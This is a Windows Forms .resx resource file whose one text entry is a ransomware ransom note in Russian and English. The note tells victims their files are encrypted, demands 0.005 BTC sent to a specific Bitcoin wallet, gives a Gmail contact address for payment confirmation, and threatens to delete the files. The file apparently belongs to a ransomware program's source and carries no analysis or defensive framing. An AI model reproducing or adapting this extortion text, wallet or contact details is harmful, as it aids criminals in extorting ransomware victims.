﻿<?xml version="1.0" encoding="utf-8"?>
<root>
  <xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
    <xsd:element name="root" msdata:IsDataSet="true">
      <xsd:complexType>
        <xsd:choice maxOccurs="unbounded">
          <xsd:element name="data">
            <xsd:complexType>
              <xsd:sequence>
                <xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
                <xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
              </xsd:sequence>
              <xsd:attribute name="name" type="xsd:string" msdata:Ordinal="1" />
              <xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
              <xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
            </xsd:complexType>
          </xsd:element>
          <xsd:element name="resheader">
            <xsd:complexType>
              <xsd:sequence>
                <xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
              </xsd:sequence>
              <xsd:attribute name="name" type="xsd:string" use="required" />
            </xsd:complexType>
          </xsd:element>
        </xsd:choice>
      </xsd:complexType>
    </xsd:element>
  </xsd:schema>
<resheader name="resmimetype"><value>text/microsoft-resx</value></resheader><resheader name="version"><value>1.3</value></resheader><resheader name="reader"><value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value></resheader><resheader name="writer"><value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value></resheader><data name="RichTextBox5.Text"><value>Ваши файлы были зашифрованы. 
Чтобы расшифровать их, получив ключ дешифровки вы должны оплатить 0.005 Btc 
на кошелёк 1PHmR17f3LEPT3dA3EKUAidZFHh8CoXk4y после чего написать на почту 
zlokeroplata@gmail.com об оплате. 
Иначе ваши файлы будут удалены без возможности восстановления. 
В письме укажите кошелёк с которого оплачивали и почту, на которую будет выслан дешифратор

Your files have been encrypted. 

To decrypt them, get the decryption key you have to pay 0.005 Btc 

the purse 1PHmR17f3LEPT3dA3EKUAidZFHh8CoXk4y then send an email 
zlokeroplata@gmail.com payment. 

Otherwise, your files will be deleted without possibility of recovery. 

Please be sure to specify the purse which paid for post, which will be sent to the decoder</value></data>
  </root>